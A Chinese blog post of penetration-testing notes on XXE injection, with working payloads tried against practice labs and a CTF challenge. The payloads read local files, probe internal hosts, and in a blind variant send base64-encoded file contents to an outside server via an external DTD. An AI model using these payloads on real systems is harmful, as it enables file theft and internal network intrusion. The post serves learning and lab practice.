WEB漏洞-XXE&XML之利用检测绕过全解

最新推荐文章于 2024-05-29 16:45:37 发布
最新推荐文章于 2024-05-29 16:45:37 发布
阅读量1.5k 收藏 6
点赞数
分类专栏: 渗透笔记2 文章标签: 前端 xml 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhscxj/article/details/122792476
版权

在这里插入图片描述xml基础概念
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

xml示例

<!--文档类型定义-->
<!DOCTYPE note [	<!--定义此文档时note类型的文档-->
<!ELEMENT note (to,from,heading,body)>	<!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>			<!--定义to元素为"#PCDATA"类型-->
<!ELEMENT from (#PCDATA)>		<!--定义from元素为"#PCDATA"类型-->
<!ELEMENT head (#PCDATA)>		<!--定义head元素为"#PCDATA"类型-->
<!ELEMENT body (#PCDATA)>		<!--定义body元素为"#PCDATA"类型-->
]]]>

<!--文档元素-->
<note>
    <to>Dave</to>
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
</note>

各各语言对应支持的协议
在这里插入图片描述

演示案例

pikachu靶场XML

文件读取协议

<?xml version = "1.0"?>
<!DOCTYPE ANY [
		<!ENTITY xxe SYSTEM "file:///d://test.txt">
]>
<x>&xxe;</x>

在此处复制xxe文件读取的poc
在这里插入图片描述
点击提交,读取d盘下名为test.txt的文件内容
在这里插入图片描述

内网探针或攻击内网应用

<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTYTY rabbit SYSTEM "http://192.168.1.4:80/index.txt">
]>
<x>&rabbit;</x>

上面的ip地址假设就是内网的一台服务器的ip地址,提交后当存在此ip以及端口文件则不会报错。还可以进行一个端口扫描,看一下端口是否开放。

引入外部实体DTD

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "http://8.130.17.18/evil2.dtd">
		%file;
]>
<x>&send;</x>
//下面的是写入文件的
evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/test.txt">

让对方服务器去访问外部的dtd文件。
可以让对方服务器去访问自己服务器上的dtd文件(自己服务器上的dtd文件根据需要自定义内容),从而到达读取等各种攻击。

条件:
看对方的应用有没有禁用外部实体引用,这也是防御XXE的一种措施。
在这里插入图片描述
在这里插入图片描述

无回显-读取文件

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
		<!ENTITY % dtd SYSTEM "http://8.130.17.18/test.dtd">
		%dtd;
		%send;
]>


test.dtd://自己test.dtd文件的内容
<!ENTITY % payload
	"<!ENTITY &#x25; send SYSTEM
'http://8.130.17.18/b.php?data=%file;'>"
>
%payload;

上面的url一般是自己的网站,通过第一步访问文件,然后再访问dtd文件,把读取到的数据赋给data,然后我们只需要再自己的网站日志,或者写个php脚本保存下来,就能看到读取到的文件数据了。
解析
1.通过php的filter协议读取d:/test.txt的文件内容赋值给变量%file
2.让对方服务器远程去访问自己服务器上的dtd文件
3.对方服务器访问到自己服务器的dtd文件后,让它通过get方式带着%file参数去访问自己服务器别的文件
4.通过日志文件查看get参数接收的值,进行base64解密

在这里插入图片描述
在这里插入图片描述
xxe绕过
https://www.cnblogs.com/20175211lyz/p/11413335.html

XXE漏洞靶场

https://github.com/c0ny1/xxe-lab

首先通过burp进行抓包,发现均为xml传输的特征(开头图片上有写特征)
在这里插入图片描述或者通过burp右键对网站进行简单的爬取
在这里插入图片描述
在爬取的结果中搜索xml关键字在这里插入图片描述搜索出很多处数据包发送类型都是xml
在这里插入图片描述发送到Repeater进行测试
在这里插入图片描述写入payload进行测试,读取d盘下test.txt文件内容
在这里插入图片描述如何发XXE漏洞:
在爬完后,通过搜索xml关键字,查看数据包,发现有通过xml进行传输数据的地方,修改payload提交进行测试。

CTF-Jarvis-OJ-Web-XXE(CTF题)

http://web.jarvisoj.com:9882/

通过抓包发现数据的传输方式是json
在这里插入图片描述更改类型为xml,并写入payload
在这里插入图片描述提交
在这里插入图片描述

深白色耳机
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB漏洞-XXE&XML检测全解(39)
san3144393495的博客
06-29 1525
除了这个形式,还有一个过滤,我们过思路就是采用协议玩法,换一种协议去执行想要的结果,或者采用外部引用,把核心代码写到外部东西上面去,DTD上面去实现过,还有一种编码把一些关键词进行编码,达到关键字的过,根据具体情况选出不同的方案。判定这个漏洞存在之后,我们该如何去用,分为两种,第一种是输出形式,用的结果显示,分为两种情况,一种情况是有回显,一种是回显;xml:xml被设计成传输和储存数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容。
XXE-XML实体注入漏洞
2301_80661529的博客
03-07 1261
DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。
【CTF-Web】XXE学习笔记(附ctfshow例题)
最新发布
jayq1的博客
05-29 995
XXE学习笔记
XXE漏洞
huangyongkang666的博客
03-29 2360
XXE漏洞 1.漏洞简介 ​ XXE 漏洞全称XML External Entity Injection,即 XML 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意 xml文件。 2.XML简介 ​ XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一
第39天:WEB漏洞-XXE&XML之检测全解1
08-03
(2)外部文档声明 (1)内部实体声明 (2)外部实体声明 (3)参数实体声明
XXE&XML之检测
weixin_52221158的博客
08-27 1326
XML被设计为传输和存储数据,XML文档结构包括XML声明,DTD文档类型定义(可选),文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
网络安全笔记 -- XXE&XML(用、检测过)
swy66的博客
09-24 1590
XXE(XML外部实体注入),用、检测
XXE的理解与
weixin_50464560的博客
11-30 1548
转载至https://www.freebuf.com/articles/web/291094.html 前置知识XXE如何理解?它是可扩展标记语言 ( XML) 用于存储和传输数据。通常始于异步JavaScript和XML技术(ajax技术):网页应用能够快速地将增量更新呈现在用户界面上,而不需要重载(刷新)整个页面。目前JSON的使用比XML更加普遍。JSON和XML都被用于在Ajax模型中的XML技术。这种标记语言允许开发人员定义和表示任意数据结构的HTML。以下为定义属性和值的Security Ass
WEB漏洞-XXE&XML检测
m0_65137829的博客
07-24 1417
XXE-"xml external entity injection" 服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入
WEB安全之XXE实体注入漏洞.pdf
12-12
XXE漏洞用了XML解析器对外部实体的处理机制。当XML文档引用了不受信任的外部实体时,攻击者可以通过构造恶意XML输入,读取服务器上的敏感信息,甚至执行系统命令。关键在于XML文档的DTD部分,它允许定义外部实体,...
105-web漏洞挖掘之XXE漏洞1
08-03
理解并防范XXE漏洞对于保障Web应用程序的安全至关重要,因为它们可能导致严重的信息泄露和系统破坏。通过深入理解XML实体、XML解析器的工作原理以及如何安全地处理XML输入,开发者可以更好地保护他们的应用程序免受...
第五节 XXE漏洞用 - 任意文件读取 无回显 -01
09-15
XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞用方法,特别是任意...
第四节 XXE漏洞用 - 任意文件读取-01
09-15
XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件读取、命令执行、甚至服务器控制...
xxe编码过(8-19)
Realiy的博客
08-19 1675
[CSAWQual 2019]Web_Unagi 只能上传xml文件,考虑存在xxe 直接上传显示waf拦截了,转换成utf16编码就能过 <!--filename:1.xml--> <!--author:ta3shi--> <!DOCTYPE users[ <!ENTITY a SYSTEM "file:///flag"> ]> <users> <user> <username>Alice</u
WEB漏洞原理】XML&XXE检测
过期的秋刀鱼
09-14 839
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
WEB 漏洞-XXE&XML检测
硫酸超的博客
08-29 615
WEB 漏洞-XXE&XML 之检测过XXE&XMLDTD内部的 DOCTYPE 声明外部DOCTYPE声明内部实体声明外部实体声明为什么使用 DTDpikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入回显玩法-读文件玩法-内网探针或攻击内网应用(触发漏洞地址)引入外部实体 dtd不回显读取文件xxe-lab 靶场登陆框 xml 数据传输测试-检测发现CTF-Vulnhub-XXE 安全真题复现-检测,用,拓展,实战CTF-Jarvis-OJ-Web-XXE 安全真题复
第39天-WEB 漏洞-XXE&XML检测全解
MCTSOG的博客
03-31 1246
文章目录思维导图基础知识XMLXXEXML 与 HTML 的主要差异DTDDTD 实体XXE 漏洞修复与防御方案-php,java,python-过滤及禁用方案 1-禁用外部实体方案 2-过滤用户提交的 XML 数据涉及案例:pikachu 靶场 xml 数据传输测试-回显,玩法,协议,引入玩法-读文件玩法-内网探针或攻击内网应用(触发漏洞地址)玩法-RCE引入外部实体 dtd无回显-读取文件evil2.dtdxxe-lab 靶场登陆框 xml 数据传输测试-检测发现CTF-Vulnhub-XXE 安全真题
XXE的用手法及
qq_36334672的博客
01-29 137
当目标运行我们引用外部实体时,可通过构造恶意数据,执行任意文件读取,内网端口探测,攻击内网,甚至命令执行——安装了expect扩展。XXE主要由DTD文档构成,因此先介绍DTD,如下所示红色部分为DTD1、开头必须声明为XML <?2、第二行为例如 <!DOCTYPE NOTE //声明此文档为NOTE类型DOCTYPE ANY //也可以为ANYDOCTYPE ROOT //ROOT之类3、DTD有内外引用两种方式1)内部的 DOCTYPE 声明2)外部文档声明。
XXE漏洞学习及
qq_38352420的博客
06-30 416
XXE漏洞基础学习 当WEB服务使用XML或者JSON中的一种进行传输时,服务器可能会接收开发人员并未预料到的数据格式。如果服务器上的XML解析器的配置不完善,在JSON传输的终端可能会遭受XXE攻击,也就是俗称的XML外部实体攻击。 XXE是一种针对XML终端实施的攻击,黑客想要实施这种攻击,需要在XML的payload包含外部实体声明,且服务器本身允许实体扩展。这样的话,黑客或许能读取WEB服务器的文件系统,通过UNC路径访问远程文件系统,或者通过HTTP/HTTPS连接到任意主机。 所以学习XXE漏.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值